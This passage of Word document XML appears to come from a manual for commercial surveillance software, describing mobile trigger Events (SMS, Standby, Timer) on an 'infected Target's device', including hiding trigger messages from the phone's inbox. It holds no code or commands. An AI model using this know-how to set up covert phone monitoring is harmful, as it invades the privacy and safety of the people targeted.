          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRDefault="00545552" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1078" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId248" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1078" DrawAspect="Content" ObjectID="_1446455293" r:id="rId249"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="00671455" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Sms</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002A187A" w:rsidRPr="00671455" w:rsidRDefault="00EB1082" w:rsidP="00EB1082">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00EB1082">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The SMS </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00EB1082">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an action when a specific text message is received from the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device. </w:t>
            </w:r>
            <w:r w:rsidRPr="00EB1082">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>The message will not be shown among the received messages on the phone.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="005701FD" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="006172B5" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002A187A" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRDefault="00B17A35" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1079" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId250" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1079" DrawAspect="Content" ObjectID="_1446455294" r:id="rId251"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="002A187A" w:rsidRPr="00671455" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Standby</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="002A187A" w:rsidRPr="00671455" w:rsidRDefault="00DC051C" w:rsidP="00DC051C">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DC051C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Standby </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC051C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="00DC051C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">ction when the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">infected Target’s device </w:t>
            </w:r>
            <w:r w:rsidRPr="00DC051C">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>enters stand-by mode (backlight off).</w:t>
            </w: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RPr="005701FD" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="005701FD" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidRPr="006172B5" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="006172B5" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="006172B5" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="006172B5" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0018169C" w:rsidTr="00B03598">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2766" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="2550" w:dyaOrig="840">
                <v:shape id="_x0000_i1080" type="#_x0000_t75" style="width:128.25pt;height:42pt" o:ole="">
                  <v:imagedata r:id="rId91" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1080" DrawAspect="Content" ObjectID="_1446455295" r:id="rId252"/>
              </w:object>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="256" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRDefault="0018169C" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6616" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Timer</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="0018169C" w:rsidRPr="00671455" w:rsidRDefault="002A187A" w:rsidP="006311A1">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="009045F2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">The Timer </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
            <w:r w:rsidRPr="009045F2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">vent triggers an </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>A</w:t>
            </w:r>
            <w:r w:rsidRPr="009045F2">
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>c</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>tion at the indicated intervals and can be configured in Loop mode, Daily mode, Date mode and AfterInst mode.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00BE54A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00BE54A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00BE54A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRPr="008254AB" w:rsidRDefault="00BE54A7" w:rsidP="00BE54A7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>- - - - - - - - - -</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00BE54A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="00BE54A7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F3493" w:rsidRDefault="009F3493">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="000450A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The images below show the pop-up </w:t>
      </w:r>
      <w:r w:rsidR="0030532D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>windows for the creation of all 10</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> different types of </w:t>
      </w:r>
      <w:r w:rsidR="009F3493">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Mobile</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> Events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="000450A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Grigliatabel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283"/>
        <w:gridCol w:w="5522"/>
      </w:tblGrid>
      <w:tr w:rsidR="000450A6" w:rsidTr="00E64C3B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3823" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E64C3B" w:rsidRPr="00E64C3B" w:rsidRDefault="003A4380" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:object w:dxaOrig="1440" w:dyaOrig="1440">
                <v:shape id="_x0000_s1236" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:180pt;height:154.5pt;z-index:251829248;mso-position-horizontal:left;mso-position-horizontal-relative:margin;mso-position-vertical:top;mso-position-vertical-relative:margin">
                  <v:imagedata r:id="rId253" o:title=""/>
                  <w10:wrap type="square" anchorx="margin" anchory="margin"/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_s1236" DrawAspect="Content" ObjectID="_1446455377" r:id="rId254"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E64C3B" w:rsidRDefault="00E17308" w:rsidP="00E64C3B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>8.5</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>[</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> RCS </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00957E2D">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Console ] </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve">Operations &gt; </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"># </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>O</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00674013">
              <w:rPr>
                <w:i/>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>peration #</w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E64C3B" w:rsidRPr="00A52C9B" w:rsidRDefault="00E64C3B" w:rsidP="00E64C3B">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(AC)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000450A6" w:rsidRDefault="000450A6" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="5522" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="000450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6" w:rsidP="00424FFC">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0450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6"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0450A6" w:rsidRPr="00E64C3B" w:rsidRDefault="000450A6"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allows you to specify which type of Event you’re about to </w:t>
            </w:r>
            <w:r w:rsidR="00E64C3B" w:rsidRPr="00E64C3B">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>create.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7" w:rsidP="000450A6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00BE54A7" w:rsidRDefault="00BE54A7">
      <w:pPr>
        <w:spacing w:after="200" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>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0450A6" w:rsidTr="00E64C3B">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00E64C3B" w:rsidRDefault="00E64C3B" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:object w:dxaOrig="4890" w:dyaOrig="5535">
                <v:shape id="_x0000_i1081" type="#_x0000_t75" style="width:187.5pt;height:212.25pt" o:ole="">
                  <v:imagedata r:id="rId255" o:title=""/>
                </v:shape>
                <o:OLEObject Type="Embed" ProgID="PBrush" ShapeID="_x0000_i1081" DrawAspect="Content" ObjectID="_1446455296" r:id="rId256"/>
              </w:object>
            </w:r>
          </w:p>
          <w:p w:rsidR="00E64C3B" w:rsidRDefault="00E64C3B" w:rsidP="00424FFC">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="8"/>
                <w:szCs w:val="8"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00E64C3B" w:rsidRDefault="00E17308" w:rsidP="00E64C3B">
            <w:pPr>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
